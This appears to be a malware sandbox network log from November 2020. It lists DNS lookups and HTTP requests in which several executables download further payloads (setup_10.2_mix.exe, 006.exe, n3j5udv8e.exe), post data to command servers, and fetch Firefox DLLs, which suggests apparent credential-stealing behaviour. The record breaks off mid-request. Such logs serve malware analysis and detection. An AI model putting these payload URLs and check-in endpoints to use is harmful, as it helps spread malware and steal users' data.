cncidx.m.hub.sandai.net

IN A

140.206.225.138
DNS

hub5sr.shub.hz.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

hub5sr.shub.hz.sandai.net

IN A

Response

hubstat.hz.sandai.net

IN CNAME

hubstat.sandai.net

hubstat.sandai.net

IN CNAME

cnchubstat.sandai.net

cnchubstat.sandai.net

IN A

140.206.225.232

cnchubstat.sandai.net

IN A

140.206.225.136
DNS

hubstat.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

hubstat.sandai.net

IN A

Response

hubstat.sandai.net

IN CNAME

cnchubstat.sandai.net

cnchubstat.sandai.net

IN A

140.206.225.232

cnchubstat.sandai.net

IN A

140.206.225.136
DNS

hubstat.sandai.net

MiniThunderPlatform.exe

Remote address:

8.8.8.8:53

Request

hubstat.sandai.net

IN A

Response

hubstat.sandai.net

IN CNAME

cnchubstat.sandai.net

cnchubstat.sandai.net

IN A

140.206.225.232

cnchubstat.sandai.net

IN A

140.206.225.136
POST

http://140.206.225.138:80/

MiniThunderPlatform.exe

Remote address:

140.206.225.138:80

Request

POST / HTTP/1.1
Host: 140.206.225.138:80
Content-type: application/octet-stream
Content-Length: 252
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: openresty/1.9.3.2
Date: Wed, 18 Nov 2020 16:05:08 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 1804
POST

http://140.206.225.138:80/

MiniThunderPlatform.exe

Remote address:

140.206.225.138:80

Request

POST / HTTP/1.1
Host: 140.206.225.138:80
Content-type: application/octet-stream
Content-Length: 124
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: openresty/1.9.3.2
Date: Wed, 18 Nov 2020 16:05:09 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://47.97.7.140:80/

MiniThunderPlatform.exe

Remote address:

47.97.7.140:80

Request

POST / HTTP/1.1
Host: 47.97.7.140:80
Content-type: application/octet-stream
Content-Length: 92
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 8604
Content-Type: application/octet-stream
Connection: Close
GET

http://dream.pics/setup_10.2_mix.exe

MiniThunderPlatform.exe

Remote address:

8.208.85.95:80

Request

GET /setup_10.2_mix.exe HTTP/1.1
Accept: */*
Accept-Language: en-US
Cache-Control: no-cache
Connection: Keep-Alive
Host: dream.pics
Pragma: no-cache
Referer: http://dream.pics
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Response

HTTP/1.1 200 OK

Server: nginx/1.16.1
Date: Wed, 18 Nov 2020 16:05:05 GMT
Content-Type: application/x-msdos-program
Content-Length: 1014829
Connection: close
Last-Modified: Tue, 17 Nov 2020 09:49:04 GMT
ETag: "f7c2d-5b44a67c1c432"
Accept-Ranges: bytes
POST

http://140.206.225.138:80/

MiniThunderPlatform.exe

Remote address:

140.206.225.138:80

Request

POST / HTTP/1.1
Host: 140.206.225.138:80
Content-type: application/octet-stream
Content-Length: 156
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: openresty/1.9.3.2
Date: Wed, 18 Nov 2020 16:05:06 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 252
GET

http://dream.pics/setup_10.2_mix.exe

MiniThunderPlatform.exe

Remote address:

8.208.85.95:80

Request

GET /setup_10.2_mix.exe HTTP/1.1
Accept: */*
Accept-Language: en-US
Cache-Control: no-cache
Connection: Keep-Alive
Host: dream.pics
Pragma: no-cache
Range: bytes=377094-468198
Referer: http://dream.pics
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.16.1
Date: Wed, 18 Nov 2020 16:05:06 GMT
Content-Type: application/x-msdos-program
Content-Length: 91105
Connection: close
Last-Modified: Tue, 17 Nov 2020 09:49:04 GMT
ETag: "f7c2d-5b44a67c1c432"
Accept-Ranges: bytes
Content-Range: bytes 377094-468198/1014829
GET

http://dream.pics/setup_10.2_mix.exe

MiniThunderPlatform.exe

Remote address:

8.208.85.95:80

Request

GET /setup_10.2_mix.exe HTTP/1.1
Accept: */*
Accept-Language: en-US
Cache-Control: no-cache
Connection: Keep-Alive
Host: dream.pics
Pragma: no-cache
Range: bytes=285989-377093
Referer: http://dream.pics
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.16.1
Date: Wed, 18 Nov 2020 16:05:06 GMT
Content-Type: application/x-msdos-program
Content-Length: 91105
Connection: close
Last-Modified: Tue, 17 Nov 2020 09:49:04 GMT
ETag: "f7c2d-5b44a67c1c432"
Accept-Ranges: bytes
Content-Range: bytes 285989-377093/1014829
GET

http://dream.pics/setup_10.2_mix.exe

MiniThunderPlatform.exe

Remote address:

8.208.85.95:80

Request

GET /setup_10.2_mix.exe HTTP/1.1
Accept: */*
Accept-Language: en-US
Cache-Control: no-cache
Connection: Keep-Alive
Host: dream.pics
Pragma: no-cache
Range: bytes=650409-1014828
Referer: http://dream.pics
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.16.1
Date: Wed, 18 Nov 2020 16:05:06 GMT
Content-Type: application/x-msdos-program
Content-Length: 364420
Connection: close
Last-Modified: Tue, 17 Nov 2020 09:49:04 GMT
ETag: "f7c2d-5b44a67c1c432"
Accept-Ranges: bytes
Content-Range: bytes 650409-1014828/1014829
GET

http://dream.pics/setup_10.2_mix.exe

MiniThunderPlatform.exe

Remote address:

8.208.85.95:80

Request

GET /setup_10.2_mix.exe HTTP/1.1
Accept: */*
Accept-Language: en-US
Cache-Control: no-cache
Connection: Keep-Alive
Host: dream.pics
Pragma: no-cache
Range: bytes=559304-650408
Referer: http://dream.pics
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.16.1
Date: Wed, 18 Nov 2020 16:05:06 GMT
Content-Type: application/x-msdos-program
Content-Length: 91105
Connection: close
Last-Modified: Tue, 17 Nov 2020 09:49:04 GMT
ETag: "f7c2d-5b44a67c1c432"
Accept-Ranges: bytes
Content-Range: bytes 559304-650408/1014829
GET

http://dream.pics/setup_10.2_mix.exe

MiniThunderPlatform.exe

Remote address:

8.208.85.95:80

Request

GET /setup_10.2_mix.exe HTTP/1.1
Accept: */*
Accept-Language: en-US
Cache-Control: no-cache
Connection: Keep-Alive
Host: dream.pics
Pragma: no-cache
Range: bytes=194876-1014828
Referer: http://dream.pics
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.16.1
Date: Wed, 18 Nov 2020 16:05:06 GMT
Content-Type: application/x-msdos-program
Content-Length: 819953
Connection: close
Last-Modified: Tue, 17 Nov 2020 09:49:04 GMT
ETag: "f7c2d-5b44a67c1c432"
Accept-Ranges: bytes
Content-Range: bytes 194876-1014828/1014829
GET

http://dream.pics/setup_10.2_mix.exe

MiniThunderPlatform.exe

Remote address:

8.208.85.95:80

Request

GET /setup_10.2_mix.exe HTTP/1.1
Accept: */*
Accept-Language: en-US
Cache-Control: no-cache
Connection: Keep-Alive
Host: dream.pics
Pragma: no-cache
Range: bytes=832619-1014828
Referer: http://dream.pics
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.16.1
Date: Wed, 18 Nov 2020 16:05:06 GMT
Content-Type: application/x-msdos-program
Content-Length: 182210
Connection: close
Last-Modified: Tue, 17 Nov 2020 09:49:04 GMT
ETag: "f7c2d-5b44a67c1c432"
Accept-Ranges: bytes
Content-Range: bytes 832619-1014828/1014829
GET

http://dream.pics/setup_10.2_mix.exe

MiniThunderPlatform.exe

Remote address:

8.208.85.95:80

Request

GET /setup_10.2_mix.exe HTTP/1.1
Accept: */*
Accept-Language: en-US
Cache-Control: no-cache
Connection: Keep-Alive
Host: dream.pics
Pragma: no-cache
Range: bytes=741514-832618
Referer: http://dream.pics
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.16.1
Date: Wed, 18 Nov 2020 16:05:06 GMT
Content-Type: application/x-msdos-program
Content-Length: 91105
Connection: close
Last-Modified: Tue, 17 Nov 2020 09:49:04 GMT
ETag: "f7c2d-5b44a67c1c432"
Accept-Ranges: bytes
Content-Range: bytes 741514-832618/1014829
GET

http://dream.pics/setup_10.2_mix.exe

MiniThunderPlatform.exe

Remote address:

8.208.85.95:80

Request

GET /setup_10.2_mix.exe HTTP/1.1
Accept: */*
Accept-Language: en-US
Cache-Control: no-cache
Connection: Keep-Alive
Host: dream.pics
Pragma: no-cache
Range: bytes=923724-1014828
Referer: http://dream.pics
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.16.1
Date: Wed, 18 Nov 2020 16:05:06 GMT
Content-Type: application/x-msdos-program
Content-Length: 91105
Connection: close
Last-Modified: Tue, 17 Nov 2020 09:49:04 GMT
ETag: "f7c2d-5b44a67c1c432"
Accept-Ranges: bytes
Content-Range: bytes 923724-1014828/1014829
GET

http://dream.pics/setup_10.2_mix.exe

MiniThunderPlatform.exe

Remote address:

8.208.85.95:80

Request

GET /setup_10.2_mix.exe HTTP/1.1
Accept: */*
Accept-Language: en-US
Cache-Control: no-cache
Connection: Keep-Alive
Host: dream.pics
Pragma: no-cache
Range: bytes=468199-650408
Referer: http://dream.pics
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.16.1
Date: Wed, 18 Nov 2020 16:05:06 GMT
Content-Type: application/x-msdos-program
Content-Length: 182210
Connection: close
Last-Modified: Tue, 17 Nov 2020 09:49:04 GMT
ETag: "f7c2d-5b44a67c1c432"
Accept-Ranges: bytes
Content-Range: bytes 468199-650408/1014829
DNS

imhub5pr.hz.sandai.net

Remote address:

8.8.8.8:53

Request

imhub5pr.hz.sandai.net

IN A

Response
DNS

score.phub.hz.sandai.net

Remote address:

8.8.8.8:53

Request

score.phub.hz.sandai.net

IN A

Response
GET

http://dream.pics/setup_10.2_mix.exe

MiniThunderPlatform.exe

Remote address:

8.208.85.95:80

Request

GET /setup_10.2_mix.exe HTTP/1.1
Accept: */*
Accept-Language: en-US
Cache-Control: no-cache
Connection: close
Host: dream.pics
Pragma: no-cache
Range: bytes=520580-
Referer: http://dream.pics
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.16.1
Date: Wed, 18 Nov 2020 16:05:07 GMT
Content-Type: application/x-msdos-program
Content-Length: 494249
Connection: close
Last-Modified: Tue, 17 Nov 2020 09:49:04 GMT
ETag: "f7c2d-5b44a67c1c432"
Accept-Ranges: bytes
Content-Range: bytes 520580-1014828/1014829
DNS

hubstat.hz.sandai.net

Remote address:

8.8.8.8:53

Request

hubstat.hz.sandai.net

IN A

Response

hubstat.hz.sandai.net

IN CNAME

hubstat.sandai.net

hubstat.sandai.net

IN CNAME

cnchubstat.sandai.net

cnchubstat.sandai.net

IN A

140.206.225.232

cnchubstat.sandai.net

IN A

140.206.225.136
POST

http://140.206.225.232:80/

MiniThunderPlatform.exe

Remote address:

140.206.225.232:80

Request

POST / HTTP/1.1
Host: 140.206.225.232:80
Content-type: application/octet-stream
Content-Length: 188
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
POST

http://140.206.225.232:80/

MiniThunderPlatform.exe

Remote address:

140.206.225.232:80

Request

POST / HTTP/1.1
Host: 140.206.225.232:80
Content-type: application/octet-stream
Content-Length: 508
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
POST

http://47.92.195.246:80/

MiniThunderPlatform.exe

Remote address:

47.92.195.246:80

Request

POST / HTTP/1.1
Host: 47.92.195.246:80
Content-type: application/octet-stream
Content-Length: 44
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
DNS

relay.phub.hz.sandai.net

Remote address:

8.8.8.8:53

Request

relay.phub.hz.sandai.net

IN A

Response
DNS

hubstat.sandai.net

Remote address:

8.8.8.8:53

Request

hubstat.sandai.net

IN A

Response

hubstat.sandai.net

IN CNAME

cnchubstat.sandai.net

cnchubstat.sandai.net

IN A

140.206.225.136

cnchubstat.sandai.net

IN A

140.206.225.232
POST

http://140.206.225.136:80/

MiniThunderPlatform.exe

Remote address:

140.206.225.136:80

Request

POST / HTTP/1.1
Host: 140.206.225.136:80
Content-type: application/octet-stream
Content-Length: 236
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 92
Content-Type: application/octet-stream
Connection: Close
POST

http://47.92.195.246:80/

MiniThunderPlatform.exe

Remote address:

47.92.195.246:80

Request

POST / HTTP/1.1
Host: 47.92.195.246:80
Content-type: application/octet-stream
Content-Length: 108
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
DNS

naritouzina.net

Remote address:

8.8.8.8:53

Request

naritouzina.net

IN A

Response

naritouzina.net

IN A

5.61.35.193
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 308
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:00 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 8
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 347
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:00 GMT
Content-Type: text/html; charset=windows-1251
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 265
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:01 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 327
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 309
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:01 GMT
Content-Type: text/html; charset=windows-1251
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 234
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:02 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 327
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 343
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:02 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 327
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 188
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:02 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 38
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 315
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:03 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 327
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 317
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:03 GMT
Content-Type: text/html; charset=windows-1251
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 273
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:04 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 327
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 165
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:05 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 49
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 334
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:07 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 327
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 137
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:07 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 84
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 134
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:09 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 327
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 251
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:09 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 43
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 316
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:11 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 327
Connection: keep-alive
X-Powered-By: PHP/5.6.40
POST

http://naritouzina.net/

Remote address:

5.61.35.193:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://naritouzina.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 119
Host: naritouzina.net

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Wed, 18 Nov 2020 16:05:11 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 43
Connection: keep-alive
X-Powered-By: PHP/5.6.40
GET

http://37.48.127.236/2.php

Remote address:

37.48.127.236:80

Request

GET /2.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 37.48.127.236

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:06:21 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="n3j5udv8e.exe"
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/octet-stream
DNS

wihumanld.com

Remote address:

8.8.8.8:53

Request

wihumanld.com

IN A

Response

wihumanld.com

IN A

194.54.80.66
GET

http://wihumanld.com/download/006.exe

Remote address:

194.54.80.66:80

Request

GET /download/006.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: wihumanld.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:13:24 GMT
Content-Type: application/octet-stream
Content-Length: 1306112
Last-Modified: Mon, 09 Nov 2020 12:27:41 GMT
Connection: keep-alive
ETag: "5fa935bd-13ee00"
Accept-Ranges: bytes
DNS

api.2ip.ua

Remote address:

8.8.8.8:53

Request

api.2ip.ua

IN A

Response

api.2ip.ua

IN A

77.123.139.190
DNS

api.2ip.ua

Remote address:

8.8.8.8:53

Request

api.2ip.ua

IN A

Response

api.2ip.ua

IN A

77.123.139.190
POST

http://ffdownload.online/business/receive

EBDD.exe

Remote address:

194.54.83.254:80

Request

POST /business/receive HTTP/1.1
User-Agent: Mozilla/4.0(compatible;MSIE7.0;WindowsNT5.1;Trident/4.0;SE2.XMetaSr1.0;SE2.XMetaSr1.0;.NETCLR2.0.50727;SE2.XMetaSr1.0)
Host: ffdownload.online
Content-Length: 512
Connection: Close
Cache-Control: no-cache

Response

HTTP/1.1 200

Set-Cookie: JSESSIONID=46cf4f9c-9303-4949-b42f-5230a89bb181; Path=/; HttpOnly
Content-Length: 0
Date: Wed, 18 Nov 2020 16:06:26 GMT
Connection: close
DNS

bitbucket.org

Remote address:

8.8.8.8:53

Request

bitbucket.org

IN A

Response

bitbucket.org

IN A

104.192.141.1
DNS

poolventsystems.com

Remote address:

8.8.8.8:53

Request

poolventsystems.com

IN A

Response

poolventsystems.com

IN A

199.195.250.165
DNS

poolventsystems.com

Remote address:

8.8.8.8:53

Request

poolventsystems.com

IN A

Response

poolventsystems.com

IN A

199.195.250.165
DNS

bbuseruploads.s3.amazonaws.com

Remote address:

8.8.8.8:53

Request

bbuseruploads.s3.amazonaws.com

IN A

Response

bbuseruploads.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN A

52.217.37.52
POST

http://poolventsystems.com/718

D814.exe

Remote address:

199.195.250.165:80

Request

POST /718 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: poolventsystems.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:06:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
GET

http://poolventsystems.com/freebl3.dll

D814.exe

Remote address:

199.195.250.165:80

Request

GET /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: poolventsystems.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:06:28 GMT
Content-Type: application/x-msdos-program
Content-Length: 334288
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "519d0-57aa1f0b0df80"
Expires: Thu, 19 Nov 2020 16:06:28 GMT
Cache-Control: max-age=86400
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://poolventsystems.com/mozglue.dll

D814.exe

Remote address:

199.195.250.165:80

Request

GET /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
